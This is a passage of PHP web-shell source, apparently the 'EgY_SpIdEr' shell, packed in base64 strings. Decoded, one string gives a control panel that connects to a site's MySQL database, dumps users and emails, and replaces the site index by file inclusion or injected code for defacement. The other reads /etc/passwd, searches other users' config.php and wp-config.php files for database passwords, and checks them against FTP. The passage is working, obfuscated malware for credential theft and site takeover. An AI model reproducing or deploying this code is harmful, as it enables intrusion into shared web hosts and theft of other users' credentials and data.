gdHlwZT0iaGlkZGVuIiBuYW1lPSJ1c2VyIiB2YWx1ZT0iJyAuICR1c2VyIC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icGFzcyIgdmFsdWU9IicgLiAkcGFzcyAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImRiIiB2YWx1ZT0iJyAuICRkYiAuICciPic7DQo/Pg0KPC9mb3JtPg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPGZvcm0gbmFtZT0iY2hhbmdlcGFzcyIgYWN0aW9uPSI/YWN0PWluYyIgbWV0aG9kPSJwb3N0Ij4NCjx0YWJsZSBib3JkZXI9IjEiIGJnY29sb3I9IiMwMDAwMDAiIGJvcmRlcmNvbG9yPSJsaW1lIg0KYm9yZGVyY29sb3JkYXJrPSJsaW1lIiBib3JkZXJjb2xvcmxpZ2h0PSJsaW1lIj4NCjx0aD46Ojo6OkNoYW5nZSBJbmRleCBieSBJbmNsdXNpb24oTm90IFBMKEVnWSBTcElkRXIpKTo6Ojo6PC90aD48dGg+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iQ2hhbmdlIiB2YWx1ZT0iQ2hhbmdlIiAvPjwvdGg+DQo8dHI+PHRkPkluZGV4IExpbmsgOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0ibGluayIgdmFsdWU9Imh0dHA6Ly93d3cuZWd5c3BpZGVyLmV1L2hhY2tlZC5odG1sIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8Pw0KZWNobyc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJob3N0IiB2YWx1ZT0iJyAuICRob3N0IC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciIgdmFsdWU9IicgLiAkdXNlciAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3MiIHZhbHVlPSInIC4gJHBhc3MgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYiIgdmFsdWU9IicgLiAkZGIgLiAnIj4nOw0KPz4NCjwvZm9ybT4NCjxociBjb2xvcj0iIzAwRkYwMCIgLz4NCjxmb3JtIG5hbWU9ImNoYW5nZXBhc3MiIGFjdGlvbj0iP2FjdD1jb2RlIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q2hhbmdlIEluZGV4IGJ5IENvZGUoQWxsIEVkaXRpb24pOjo6Ojo8L3RoPjx0aD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJDaGFuZ2UiIHZhbHVlPSJDaGFuZ2UiIC8+PC90aD4NCjx0cj48dGQ+SW5kZXggQ29kZSA6IDwvdGQ+PHRkPjx0ZXh0YXJlYSBuYW1lPSJjb2RlIiBjb2xzPTYwIHJvd3M9MjA+PC90ZXh0YXJlYT48L3RkPjwvdHI+DQo8L3RhYmxlPg0KPD8NCmVjaG8nPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iaG9zdCIgdmFsdWU9IicgLiAkaG9zdCAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InVzZXIiIHZhbHVlPSInIC4gJHVzZXIgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXNzIiB2YWx1ZT0iJyAuICRwYXNzIC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZGIiIHZhbHVlPSInIC4gJGRiIC4gJyI+JzsNCj8+DQo8L2Zvcm0+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Zm9ybSBuYW1lPSJjaGFuZ2VwYXNzIiBhY3Rpb249Ij9hY3Q9c2hlbGwiIG1ldGhvZD0icG9zdCI+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+DQo8dGg+Ojo6OjpJbmplY3QgRmlsZUluY2x1c2lvbiBFeHBsb2l0KE5PVCBQTChBTC1NQVNTWUEpKTo6Ojo6PC90aD48dGg+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iQ2hhbmdlIiB2YWx1ZT0iQ2hhbmdlIiAvPjwvdGg+DQo8dHI+PHRkPlZhcmlhYmxlIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InZhciIgdmFsdWU9InNoZWxsIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8Pw0KZWNobyc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJob3N0IiB2YWx1ZT0iJyAuICRob3N0IC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciIgdmFsdWU9IicgLiAkdXNlciAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3MiIHZhbHVlPSInIC4gJHBhc3MgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYiIgdmFsdWU9IicgLiAkZGIgLiAnIj4nOw0KPz4NCjwvZm9ybT4NCjw/DQp9DQppZiAoJGFjdCA9PSAnJyl7DQo/Pg0KPGZvcm0gbmFtZT0ibXlmb3JtIiBhY3Rpb249Ij9hY3Q9bG9naW4iIG1ldGhvZD0icG9zdCI+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+DQo8dGg+Ojo6OjpEQVRBQkFTRSBDT05GSUc6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNvbm5lY3QiIHZhbHVlPSJDb25uZWN0IiAvPjwvdGg+PHRyPjx0ZD5Ib3N0IDogPC90ZD48dGQ+PGlucHV0IG5hbWU9Imhvc3QiIHZhbHVlPSJsb2NhbGhvc3QiIC8+PC90ZD48L3RyPg0KPHRyPjx0ZD5Vc2VyIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InVzZXIiIHZhbHVlPSJyb290IiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+UGFzcyA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJwYXNzIiB2YWx1ZT0iIiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+TmFtZSA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJkYiIgdmFsdWU9InZiIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8L2Zvcm0+DQoNCjw/DQp9DQppZiAoJGFjdCA9PSAnbHN0JyAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ2RiJ10pKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Pw0KJHJlID0gbXlzcWxfcXVlcnkoJ3NlbGVjdCAqIGZyb20gdXNlcicpOw0KZWNobyc8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+PHRoPklEPC90aD48dGg+VVNFUk5BTUU8L3RoPjx0aD5FTUFJTDwvdGg+JzsNCndoaWxlICgkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlKSkNCnsNCmVjaG8nPHRyPjx0ZD4nIC4gJHJvd1sndXNlcmlkJ10gLiAnPC90ZD48dGQ+JyAuICRyb3dbJ3VzZXJuYW1lJ10gLiAnPC90ZD48dGQ+JyAuICRyb3dbJ2VtYWlsJ10gLiAnPC90ZD48L3RyPic7DQp9DQplY2hvJzwvdGFibGU+JzsNCj8+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+PHRoPjw/DQokY291bnQgPSBteXNxbF9udW1fcm93cygkcmUpOw0KZWNobyAnTnVtYmVyIG9mIHVzZXJzIHJlZ2lzdGVyZWQgaXMgOiBbICcgLiAkY291bnQgLiAnIF0nOw0KID8+PC90aD48L3RhYmxlPg0KPD8NCn0NCmlmICgkYWN0ID09ICd1c2Vycycpew0KPz4NCiA8Zm9ybSBuYW1lPSJteWZvcm0iIGFjdGlvbj0iP2FjdD1sc3QiIG1ldGhvZD0icG9zdCI+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+DQo8dGg+Ojo6OjpEQVRBQkFTRSBDT05GSUc6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNvbm5lY3QiIHZhbHVlPSJDb25uZWN0IiAvPjwvdGg+PHRyPjx0ZD5Ib3N0IDogPC90ZD48dGQ+PGlucHV0IG5hbWU9Imhvc3QiIHZhbHVlPSJsb2NhbGhvc3QiIC8+PC90ZD48L3RyPg0KPHRyPjx0ZD5Vc2VyIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InVzZXIiIHZhbHVlPSJyb290IiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+UGFzcyA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJwYXNzIiB2YWx1ZT0iIiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+TmFtZSA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJkYiIgdmFsdWU9InZiIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8L2Zvcm0+DQo8Pw0KfQ0KaWYgKCRhY3Q9PSdjb25maWcnKQ0Kew0KPz4NCjxmb3JtIG5hbWU9Im15Zm9ybSIgYWN0aW9uPSI/YWN0PXJlY29uZmlnIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q09ORklHIFBBVEg6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNvbm5lY3QiIHZhbHVlPSJSZWFkIiAvPjwvdGg+DQo8dHI+PHRkPlBBVEggOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0icGF0aCIgdmFsdWU9Ii9ob21lL2hhY2tlZC9wdWJsaWNfaHRtbC92Yi9pbmNsdWRlcy9jb25maWcucGhwIiAvPjwvdGQ+PC90cj48L3RhYmxlPjwvZm9ybT4NCjw/DQp9DQppZiAoJGFjdD09J2luZGV4JykNCnsNCi8vIEluZGV4IEVkaXRvcjxIVE1MIEVkaXRvcj4NCj8+DQo8c2NyaXB0IGxhbmd1YWdlPSdqYXZhc2NyaXB0Jz4NCmZ1bmN0aW9uIGxpbmsoKXsNCnZhciBYID0gcHJvbXB0KCJFbnRlclRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCnZhciB5ID0gcHJvbXB0KCJFbnRlcmxpbmsiLCIiKQ0KaWYgKHk9PSIiIHwgeT09bnVsbCApIHsNCnJldHVybjsNCn0NCg0KaW5kZXhmb3JtLmluZGV4LnZhbHVlPWluZGV4Zm9ybS5pbmRleC52YWx1ZSArICI8YSBocmVmPSIgKyB5ICsiPiIrWCsiPC9hPiI7DQoNCn0NCg0KZnVuY3Rpb24gcmlnaHQoKXsNCnZhciBYID0gcHJvbXB0KCJFbnRlciBUZXh0IiwiIikNCmlmIChYPT0iIiB8IFg9PW51bGwgKSB7DQpyZXR1cm47DQp9DQppbmRleGZvcm0uaW5kZXgudmFsdWU9aW5kZXhmb3JtLmluZGV4LnZhbHVlICsgIjxwIGFsaWduPSdyaWdodCc+IitYKyI8L3A+IjsNCg0KfQ0KZnVuY3Rpb24gbGVmdCgpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPHAgYWxpZ249J2xlZnQnPiIrWCsiPC9wPiI7DQoNCn0NCmZ1bmN0aW9uIGNlbnRlcigpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPGNlbnRlcj4iK1grIjwvY2VudGVyPiI7DQoNCn0NCmZ1bmN0aW9uIGNvbG91cigpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyVGV4dCIsIiIpDQppZiAoWD09IiIgfCBYPT1udWxsICkgew0KcmV0dXJuOw0KfQ0KdmFyIHkgPSBwcm9tcHQoIkVudGVyQ29sb3VyIiwiIikNCmlmICh5PT0iIiB8IHk9PW51bGwgKSB7DQpyZXR1cm47DQp9DQoNCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPGZvbnQgY29sb3I9IiArIHkgKyI+IitYKyI8L2ZvbnQ+IjsNCg0KfQ0KZnVuY3Rpb24gYigpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPEI+IitYKyI8L0I+IjsNCg0KfQ0KZnVuY3Rpb24gdSgpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPFU+IitYKyI8L1U+IjsNCg0KfQ0KZnVuY3Rpb24gaSgpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPEk+IitYKyI8L0k+IjsNCg0KfQ0KZnVuY3Rpb24gbWFyKCl7DQp2YXIgWCA9IHByb21wdCgiRW50ZXIgVGV4dCIsIiIpDQppZiAoWD09IiIgfCBYPT1udWxsICkgew0KcmV0dXJuOw0KfQ0KaW5kZXhmb3JtLmluZGV4LnZhbHVlPWluZGV4Zm9ybS5pbmRleC52YWx1ZSArICI8bWFycXVlZT4iK1grIjwvbWFycXVlZT4iOw0KDQp9DQpmdW5jdGlvbiBpbWcoKXsNCnZhciBYID0gcHJvbXB0KCJFbnRlciBsaW5rIiwiIikNCmlmIChYPT0iIiB8IFg9PW51bGwgKSB7DQpyZXR1cm47DQp9DQppbmRleGZvcm0uaW5kZXgudmFsdWU9aW5kZXhmb3JtLmluZGV4LnZhbHVlICsgIjxpbWcgc3JjPSciK1grIic+PC9pbWc+IjsNCg0KfQ0KZnVuY3Rpb24gYnIoKXsNCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPGJyPiI7DQoNCn0NCjwvc2NyaXB0Pg0KPHRhYmxlIGJvcmRlcj0iMSIgYm9yZGVyY29sb3I9IiMwMDgwMDAiIGJvcmRlcmNvbG9yZGFyaz0iIzAwODAwMCINCmJvcmRlcmNvbG9ybGlnaHQ9IiMwMDgwMDAiPjx0aD48YSBvbmNsaWNrPSdyZXR1cm4gY2VudGVyKCknPkNlbnRlcjwvYT4gfHx8IDxhIG9uY2xpY2s9J3JldHVybiBsZWZ0KCknPkxlZnQ8L2E+IHx8fCA8YSBvbmNsaWNrPSdyZXR1cm4gcmlnaHQoKSc+cmlnaHQ8L2E+IHx8fCA8YSBvbmNsaWNrPSdyZXR1cm4gYigpJz5Cb2xkPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIHUoKSc+VW5kZXJMaW5lPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGkoKSc+SXRhbGljPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGJyKCknPk5ld0xpbmU8L2E+IHx8fCA8YSBvbmNsaWNrPSdyZXR1cm4gY29sb3VyKCknPkNvbG91cjwvYT4gfHx8IDxhIG9uY2xpY2s9J3JldHVybiBtYXIoKSc+TWFycXVlZSB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGltZygpJz5QaWN0dXJlPC9hPiB8fHwgPGEgb25jbGljaz0ncmV0dXJuIGxpbmsoKSc+TGluazwvYT48L2E+PC90aD48dHI+PFREPg0KPGNlbnRlcj48Zm9ybSBuYW1lPSJpbmRleGZvcm0iIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiPjx0ZXh0YXJlYSBuYW1lPSdpbmRleCcgcm93cz0nMTQnIGNvbHM9Jzg2Jz48L3RleHRhcmVhPjwvcD4NCjwvZm9ybT48L2Zvcm0+PC9jZW50ZXI+DQo8L1REPjwvdHI+PHRyPjx0ZD5Db3B5IFRoZSBDb2RlIGFmdGVyIEZpbmlzaGluZyB5b3VyIGluZGV4PC90ZD48L3RyPjwvdGFibGU+DQo8Pw0KfQ0KPz4NCjxociBjb2xvcj0iIzAwRkYwMCIgLz4NCjx0YWJsZSBib3JkZXI9IjEiIGJnY29sb3I9IiMwMDAwMDAiIGJvcmRlcmNvbG9yPSJsaW1lIg0KYm9yZGVyY29sb3JkYXJrPSJsaW1lIiBib3JkZXJjb2xvcmxpZ2h0PSJsaW1lIj48dHI+PHRkPjxhIGhyZWY9Ij8iPk1haW4gU2hlbGw8L2E+PC90ZD48dGQ+PGEgaHJlZj0iP2FjdD11c2VycyI+TGlzdCBVc2VyczwvYT48L3RkPjx0ZD48YSBocmVmPSI/YWN0PWluZGV4Ij5JbmRleCBNYWtlcjwvYT48L3RkPjx0ZD48YSBocmVmPSI/YWN0PWNvbmZpZyI+UmVhZENvbmZpZzwvYT48L3RkPjwvdHI+PC90YWJsZT4NCjxwIGFsaWduPSJjZW50ZXIiPnd3dy5lZ3lzcGlkZXIuZXU8L3A+DQo8RElWIGlkPSJuIiBhbGlnbj0iY2VudGVyIj4NCiAgPFRBQkxFIGJvcmRlckNvbG9yPSIjMTExMTExIiBjZWxsU3BhY2luZz0iMCIgY2VsbFBhZGRpbmc9IjAiIHdpZHRoPSIxMDAlIiBib3JkZXI9IjEiPg0KICAgIDxUQk9EWT4NCiAgICAgIDxUUj4NCiAgICAgICAgPFREIHdpZHRoPSIxMDAlIj48cCBhbGlnbj0iY2VudGVyIj48U1RST05HPm8tLS1bIEVnWV9TcElkRXIgfCB8IDxBIGVneV9zcGlkZXJAaG90bWFpbC5jb20+ZWd5X3NwaWRlckBob3RtYWlsLmNvbTwvQT4gICBdLS0tbzwvU1RST05HPjwvcD48L1REPg0KICAgICAgPC9UUj4NCiAgICA8L1RCT0RZPg0KICA8L1RBQkxFPg0KPC9ESVY+DQo8L2NlbnRlcj4gDQogPC9ib2R5Pg0KPC9odG1sPg="; + +$egy_cp="PD9waHAgDQplY2hvICI8aHRtbD4iOyANCmVjaG8gIjx0aXRsZT5FZ1lfU3BJZEVyIFNoRWxMIDwvdGl0bGU+PFNUWUxFPg0KDQpCT0RZDQogew0KICAgICAgICBTQ1JPTExCQVItRkFDRS1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLUhJR0hMSUdIVC1DT0xPUjogIzAwMDAwMDsgU0NST0xMQkFSLVNIQURPVy1DT0xPUjogIzAwMDAwMDsgQ09MT1I6ICM2NjY2NjY7IFNDUk9MTEJBUi0zRExJR0hULUNPTE9SOiAjNzI2NDU2OyBTQ1JPTExCQVItQVJST1ctQ09MT1I6ICM3MjY0NTY7IFNDUk9MTEJBUi1UUkFDSy1DT0xPUjogIzI5MjkyOTsgRk9OVC1GQU1JTFk6IFZlcmRhbmE7IFNDUk9MTEJBUi1EQVJLU0hBRE9XLUNPTE9SOiAjNzI2NDU2DQp9DQoNCi50ZDEgew0KQk9SREVSOiAxOw0KZm9udDogN3B0IHRhaG9tYTsNCmNvbG9yOiAjZmZmZmZmOw0KfQ0KDQoudHIxIHsNCkJPUkRFUjogMTsNCmNvbG9yOiAjMzMzMzMzOw0KfQ0KdGFibGUgew0KQk9SREVSOiAgI2VlZWVlZSAgb3V0c2V0Ow0KQkFDS0dST1VORC1DT0xPUjogIzAwMDAwMDsNCmNvbG9yOiAjMzMzMzMzOw0KfQ0KdGV4dGFyZWEgew0KQk9SREVSLVJJR0hUOiAgI2ZmZmZmZiAxIHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUxFRlQ6ICAgIzk5OTk5OSAxIHNvbGlkOw0KQk9SREVSLUJPVFRPTTogI2ZmZmZmZiAxIHNvbGlkOw0KQkFDS0dST1VORC1DT0xPUjogIzMzMzMzMzsNCmZvbnQ6IEZpeGVkc3lzIGJvbGQ7DQpjb2xvcjogI2ZmZmZmZjsNCn0NCkJPRFkgew0KbWFyZ2luOiAxOw0KY29sb3I6ICMzMzMzMzM7DQpiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOw0KfQ0KQTpsaW5rIHtDT0xPUjpyZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZX0NCkE6dmlzaXRlZCB7IENPTE9SOnJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KQTphY3RpdmUge0NPTE9SOnJlZDsgVEVYVC1ERUNPUkFUSU9OOiBub25lfQ0KQTpob3ZlciB7Y29sb3I6Ymx1ZTtURVhULURFQ09SQVRJT046IG5vbmV9DQoNCjwvU1RZTEU+PGJvZHk+IjsgDQoNCnNldF90aW1lX2xpbWl0KDApOyANCiMjIyMjIyMjIyMjIyMjIyMjIyANCkAkcGFzc3dkPWZvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKTsgDQppZiAoISRwYXNzd2QpIHsgDQogIGVjaG8gIlstXSBFcnJvciA6IGNvdWRuJ3QgcmVhZCAvZXRjL3Bhc3N3ZCI7IA0KICBleGl0OyANCn0gDQokcGF0aF90b19wdWJsaWM9YXJyYXkoKTsgDQokdXNlcnM9YXJyYXkoKTsgDQokcGF0aHRvY29uZj1hcnJheSgpOyANCiRpPTA7IA0KDQp3aGlsZSghZmVvZigkcGFzc3dkKSkgeyANCiRzdHI9ZmdldHMoJHBhc3N3ZCk7IA0KaWYgKCRpPjM1KSB7IA0KICAgJHBvcz1zdHJwb3MoJHN0ciwiOiIpOyANCiAgICR1c2VybmFtZT1zdWJzdHIoJHN0ciwwLCRwb3MpOyANCiAgICRkaXJ6PSIvaG9tZS8kdXNlcm5hbWUvcHVibGljX2h0bWwvIjsgDQogICBpZiAoKCR1c2VybmFtZSE9IiIpKSB7IA0KICAgICAgIGlmIChpc19yZWFkYWJsZSgkZGlyeikpIHsgDQogICAgICAgICAgIGFycmF5X3B1c2goJHVzZXJzLCR1c2VybmFtZSk7IA0KICAgICAgICAgICBhcnJheV9wdXNoKCRwYXRoX3RvX3B1YmxpYywkZGlyeik7IA0KICAgICAgIH0gDQogICB9IA0KfSANCiRpKys7IA0KfSANCiMjIyMjIyMjIyMjIyMjIyMjIyMgDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgDQplY2hvICI8YnI+PGJyPiI7IA0KZWNobyAiPHRleHRhcmVhIG5hbWU9J21haW5fd2luZG93JyBjb2xzPTEwMCByb3dzPTIwPiI7IA0KDQplY2hvICJbK10gRm91bmRlZCAiLnNpemVvZigkdXNlcnMpLiIgZW50cnlzIGluIC9ldGMvcGFzc3dkXG4iOyANCmVjaG8gIlsrXSBGb3VuZGVkICIuc2l6ZW9mKCRwYXRoX3RvX3B1YmxpYykuIiByZWFkYWJsZSBwdWJsaWNfaHRtbCBkaXJlY3Rvcmllc1xuIjsgDQoNCmVjaG8gIlt+XSBTZWFyY2hpbmcgZm9yIHBhc3N3b3JkcyBpbiBjb25maWcuKiBmaWxlcy4uLlxuXG4iOyANCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikgeyANCiAgICAgICAkcGF0aD0iL2hvbWUvJHVzZXIvcHVibGljX2h0bWwvIjsgDQogICAgICAgcmVhZF9kaXIoJHBhdGgsJHVzZXIpOyANCn0gDQoNCmVjaG8gIlxuWytdIERvbmVcbiI7IA0KDQpmdW5jdGlvbiByZWFkX2RpcigkcGF0aCwkdXNlcm5hbWUpIHsgDQogICBpZiAoJGhhbmRsZSA9IG9wZW5kaXIoJHBhdGgpKSB7IA0KICAgICAgIHdoaWxlIChmYWxzZSAhPT0gKCRmaWxlID0gcmVhZGRpcigkaGFuZGxlKSkpIHsgDQogICAgICAgICAgICAgJGZwYXRoPSIkcGF0aCRmaWxlIjsgDQogICAgICAgICAgICAgaWYgKCgkZmlsZSE9Jy4nKSBhbmQgKCRmaWxlIT0nLi4nKSkgeyANCiAgICAgICAgICAgICAgICBpZiAoaXNfcmVhZGFibGUoJGZwYXRoKSkgeyANCiAgICAgICAgICAgICAgICAgICAkZHI9IiRmcGF0aC8iOyANCiAgICAgICAgICAgICAgICAgICBpZiAoaXNfZGlyKCRkcikpIHsgDQogICAgICAgICAgICAgICAgICAgICAgcmVhZF9kaXIoJGRyLCR1c2VybmFtZSk7IA0KICAgICAgICAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgZWxzZSB7IA0KICAgICAgICAgICAgICAgICAgICAgICAgaWYgKCgkZmlsZT09J2NvbmZpZy5waHAnKSBvciAoJGZpbGU9PSdjb25maWcuaW5jLnBocCcpIG9yICgkZmlsZT09J2RiLmluYy5waHAnKSBvciAoJGZpbGU9PSdjb25uZWN0LnBocCcpIG9yICgkZmlsZT09J3dwLWNvbmZpZy5waHAnKSBvciAoJGZpbGU9PSd2YXIucGhwJykgb3IgKCRmaWxlPT0nY29uZmlndXJlLnBocCcpIG9yICgkZmlsZT09J2RiLnBocCcpIG9yICgkZmlsZT09J2RiX2Nvbm5lY3QucGhwJykpIHsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAkcGFzcz1nZXRfcGFzcygkZnBhdGgpOyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkcGFzcyE9JycpIHsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlY2hvICJbK10gJGZwYXRoXG4kcGFzc1xuIjsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmdHBfY2hlY2soJHVzZXJuYW1lLCRwYXNzKTsgDQogICAgICAgICAgICAgICAgICAgICAgICAgICB9IA0KICAgICAgICAgICAgICAgICAgICAgICAgfSANCiAgICAgICAgICAgICAgICAgI